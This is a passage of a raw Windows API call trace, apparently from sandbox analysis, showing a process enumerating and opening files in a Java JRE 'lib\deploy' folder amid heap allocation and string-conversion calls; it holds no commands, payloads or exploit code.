Flags=0x0, Size=0x40) returned 0x536d0 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0095.091] AreFileApisANSI () returned 1 [0095.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0095.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 72 [0095.091] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8)) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0095.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.091] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_zh_TW.properties", cAlternateFileName="MECC18~1.PRO")) returned 1 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0095.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0095.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0095.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0095.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0095.092] AreFileApisANSI () returned 1 [0095.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties", lpUsedDefaultChar=0x0) returned 72 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0095.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.092] AreFileApisANSI () returned 1 [0095.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0095.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 72 [0095.093] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.093] GetFileType (hFile=0x368) returned 0x1 [0095.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0095.093] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.093] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.093] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.094] CloseHandle (hObject=0x368) returned 1 [0095.094] AreFileApisANSI () returned 1 [0095.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0095.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 72 [0095.094] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.094] GetFileType (hFile=0x368) returned 0x1 [0095.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0095.094] CloseHandle (hObject=0x368) returned 1 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0095.095] AreFileApisANSI () returned 1 [0095.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0095.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties") returned 72 [0095.095] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8)) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0095.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0095.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.096] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x218e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="splash.gif", cAlternateFileName="")) returned 1 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0095.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0095.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.096] AreFileApisANSI () returned 1 [0095.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif", lpUsedDefaultChar=0x0) returned 57 [0095.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0095.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.097] AreFileApisANSI () returned 1 [0095.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0095.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0095.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 57 [0095.097] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.097] GetFileType (hFile=0x368) returned 0x1 [0095.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0095.097] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.097] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.098] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.098] CloseHandle (hObject=0x368) returned 1 [0095.098] AreFileApisANSI () returned 1 [0095.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0095.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0095.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 57 [0095.098] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 